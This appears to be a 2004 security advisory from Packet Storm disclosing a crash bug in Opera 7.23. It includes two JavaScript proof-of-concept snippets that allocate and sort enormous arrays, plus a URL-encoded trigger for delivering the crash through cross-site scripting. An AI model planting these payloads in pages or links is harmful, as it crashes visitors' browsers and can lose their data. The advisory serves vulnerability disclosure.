opera723.txt

2004-03-15T00:00:00
ID PACKETSTORM:32860
Type packetstorm
Reporter d3thstar
Modified 2004-03-15T00:00:00

Description

                                        
                                            `Opera Array Allocation Managment Exploit  
=====================================  
Dicovered by- d3thStaR [!AM] <d3thStaR at rootthief.com>  
Greets: !AM Crew, Atomix, d3thstar, mgrd, 0x29A Crew, rootthief.com.  
Sources: Safari Overflow Exploit- kang  
Confirmed products effected- Opera 7.23 Linux, Opera 7.23 Windows  
  
=======Description of Problem=======  
Someone could remotely seg-fault the Opera web-browser by creating an array allocation managment error.  
  
<script>var a = new Array(99999999999999999999999); a[0+5]="AAAAA";</script>  
  
<script>var bam = new Array(0x23000000); bam.sort(new Function("return 1"));</script>  
  
Results in crashed client. No, severe, damage; did loose a 'Note' on one test.  
  
=======Precautions=======  
Be aware of cross-site scripting attacks.  
  
Known URL triggers: %40%3cscript%3evar%20bam%20%3d%20new%20Array%280x2  
3000000%29%3b%20bam%2esort%28new%20Function%28%22r  
eturn%201%22%29%29%3b%3c%2fscript%3e  
  
Vendor- Opera.com  
Notified- 3/12/04_1:04am/Central  
  
d3thStaR  
<d3thStaR at rootthief.com>  
  
`